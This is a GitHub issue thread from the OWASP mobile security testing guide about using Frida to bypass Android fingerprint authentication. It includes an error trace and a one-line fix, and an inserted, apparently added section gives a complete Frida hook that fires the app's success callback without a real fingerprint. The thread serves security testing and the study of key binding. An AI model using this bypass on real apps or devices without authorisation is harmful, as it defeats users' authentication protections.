OWASP / owasp-mastg

The Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes the technical processes for verifying the controls listed in the OWASP Mobile Application Security Verification Standard (MASVS).
https://mas.owasp.org/
Creative Commons Attribution Share Alike 4.0 International

Android biometry auth bypass #1461

Closed d0n473ll0 closed 4 years ago

d0n473ll0 commented 5 years ago

Hi there!

OWASP MSTG (https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05f-Testing-Local-Authentication.md#dynamic-analysis-1) contains the following:

"you could use Frida to call the onAuthenticationSucceeded callback method directly"

I tried to implement this attack using Frida, and I can't find an appropriate JS script on the Internet. I also tried to write my own script for the attack, but unsuccessfully.

Are you sure that such attack is possible in practice?

commjoen commented 5 years ago

Hi @d0n473ll0, thank you for submitting your issue. I can have a look at those scripts soon after AppSec Global Amsterdam ;-).

sushi2k commented 5 years ago

@d0n473ll0 Sorry for the late response. If possible, could you share the Frida script that you have done and what the error is?

Otherwise, you could try the script from MWR: https://labs.f-secure.com/blog/how-secure-is-your-android-keystore-authentication, in the section "Biometric/Fingerprint authentication".

https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js

If it works, please let us know then we can also add it to the MSTG.

d0n473ll0 commented 5 years ago

@sushi2k Hello! Thank you very much! It works with a little fix!

When I tried https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js on an AVD emulator with API 23, I got this error:

    Error: <init>(): argument count of 3 does not match any of:
        .overload('android.hardware.fingerprint.FingerprintManager$CryptoObject', 'android.hardware.fingerprint.Fingerprint')
        at throwOverloadError (frida/node_modules/frida-java-bridge/lib/class-factory.js:1192)
        at n (frida/node_modules/frida-java-bridge/lib/class-factory.js:692)
        at /repl34.js:168
        at input:1

because the FingerprintManager.AuthenticationResult object has just 2 arguments (see https://android.googlesource.com/platform/frameworks/base/+/marshmallow-release/core/java/android/hardware/fingerprint/FingerprintManager.java#268).

And then I just changed https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js#L168 to `var authenticationResultInst = authenticationResultObj.$new(null, null);` and the attack was a success!
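
The constructor-arity problem described above is API-level dependent: the F-Secure script hard-codes a three-argument AuthenticationResult constructor, while API 23 only has a two-argument one. The following Frida script is an added example (not the MASTG's text and not F-Secure's script) that generalises the fix: it reads the constructor overloads of FingerprintManager$AuthenticationResult at run time, picks the one with the fewest parameters, fills the slots with placeholder values, and hands the captured CryptoObject through so the app's Cipher/Signature still reaches the callback. The Frida-specific part only runs inside Java.perform on a device; the descriptors CTOR_API23 and CTOR_NEWER are constructed here for offline checks, and the shape of `$init.overloads` / `argumentTypes[i].className` is the frida-java-bridge method-wrapper shape as I understand it (assumption).

```javascript
// Frida script: call onAuthenticationSucceeded directly, choosing the
// FingerprintManager$AuthenticationResult constructor overload at run time so
// the same script works on API 23 (2 parameters) and on newer releases.
// Added example, not the MASTG's or F-Secure's code.

// Map a Java parameter type name to a placeholder value for that slot.
function defaultArgFor(className) {
  switch (className) {
    case 'int': case 'long': case 'short': case 'byte':
    case 'float': case 'double': case 'char':
      return 0;
    case 'boolean':
      return false;
    default:            // object references (CryptoObject, Fingerprint, ...)
      return null;
  }
}

// Given constructor overloads in the shape of Frida's Klass.$init.overloads
// ([{ argumentTypes: [{ className }] }], assumed), pick the one with the
// fewest parameters: it needs the least guessing about placeholder values.
function pickOverload(overloads) {
  if (!overloads || overloads.length === 0) {
    throw new Error('no constructor overloads found');
  }
  return overloads.reduce(function (best, o) {
    return o.argumentTypes.length < best.argumentTypes.length ? o : best;
  });
}

var CRYPTO = 'android.hardware.fingerprint.FingerprintManager$CryptoObject';
var FP = 'android.hardware.fingerprint.Fingerprint';

// Build the argument list for an overload. The CryptoObject slot receives the
// object the app passed to authenticate(); every other slot gets a placeholder.
function buildCtorArgs(overload, crypto) {
  return overload.argumentTypes.map(function (t) {
    return t.className === CRYPTO ? crypto : defaultArgFor(t.className);
  });
}

function typeNames(overload) {
  return overload.argumentTypes.map(function (t) { return t.className; });
}

// Constructed descriptors (not read from a device) for offline checks:
// the API 23 constructor from the error above, and a hypothetical 3-parameter
// one of the kind the F-Secure script expects.
var CTOR_API23 = { argumentTypes: [{ className: CRYPTO }, { className: FP }] };
var CTOR_NEWER = { argumentTypes: [{ className: CRYPTO }, { className: FP }, { className: 'int' }] };

if (typeof Java !== 'undefined') {          // only inside Frida on the device
  Java.perform(function () {
    var FingerprintManager = Java.use('android.hardware.fingerprint.FingerprintManager');
    var AuthResult = Java.use('android.hardware.fingerprint.FingerprintManager$AuthenticationResult');

    // When the app calls authenticate(), skip the sensor and fire its success
    // callback with a synthetic AuthenticationResult.
    FingerprintManager.authenticate.overload(
      CRYPTO,
      'android.os.CancellationSignal', 'int',
      'android.hardware.fingerprint.FingerprintManager$AuthenticationCallback',
      'android.os.Handler'
    ).implementation = function (crypto, cancel, flags, callback, handler) {
      var ctor = pickOverload(AuthResult.$init.overloads);
      console.log('[*] AuthenticationResult ctor: (' + typeNames(ctor).join(', ') + ')');
      var make = AuthResult.$new.overload.apply(AuthResult.$new, typeNames(ctor));
      var result = make.apply(AuthResult, buildCtorArgs(ctor, crypto));
      callback.onAuthenticationSucceeded(result);
    };
  });
}
```

Passing the original CryptoObject through is deliberate: if the app's key was created with setUserAuthenticationRequired(true), the Cipher inside it is still unusable without a real authentication and the app's decrypt step should fail, so the script doubles as a check that the key is actually bound to the biometric and not just gated by the callback. Apps targeting API 28 and later usually go through BiometricPrompt rather than FingerprintManager, so the hook target would differ there.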

d0n473ll0 commented 5 years ago

And I plan to test it on a real device

commjoen commented 5 years ago

maybe have a little PR about this to further show how this works to all the rest of the readers :) ?

sushi2k commented 5 years ago

This issue is linked to https://github.com/OWASP/owasp-mstg/issues/946 and #1504.

sushi2k commented 4 years ago

> @sushi2k Hello! Thank you very much! It works with a little fix!
>
> When I tried https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js on an AVD emulator with API 23, I got this error:
>
>     Error: <init>(): argument count of 3 does not match any of:
>         .overload('android.hardware.fingerprint.FingerprintManager$CryptoObject', 'android.hardware.fingerprint.Fingerprint')
>         at throwOverloadError (frida/node_modules/frida-java-bridge/lib/class-factory.js:1192)
>         at n (frida/node_modules/frida-java-bridge/lib/class-factory.js:692)
>         at /repl34.js:168
>         at input:1
>
> because the FingerprintManager.AuthenticationResult object has just 2 arguments (see https://android.googlesource.com/platform/frameworks/base/+/marshmallow-release/core/java/android/hardware/fingerprint/FingerprintManager.java#268).
>
> And then I just changed https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js#L168 to `var authenticationResultInst = authenticationResultObj.$new(null, null);` and the attack was a success!

I raised it to the authors of the script (https://github.com/FSecureLABS/android-keystore-audit/issues/3) so will close this one. Could you reproduce this on a real device? If so, give them a nudge on the issue I created. Thanks

umersiddique741 commented 3 years ago

How to prevent biometric authentication mechanism in mobile application?

WarrDaddy commented 3 years ago

Hey, I'm experiencing this issue. I've added the variable to line 168 per d0n473ll0's recommendation; however, the error is persistent.

cpholguera commented 3 years ago

Hi @WarrDaddy, if you're experiencing any issues with that script please contact the authors directly at https://github.com/FSecureLABS/android-keystore-audit/issues/3

Thank you!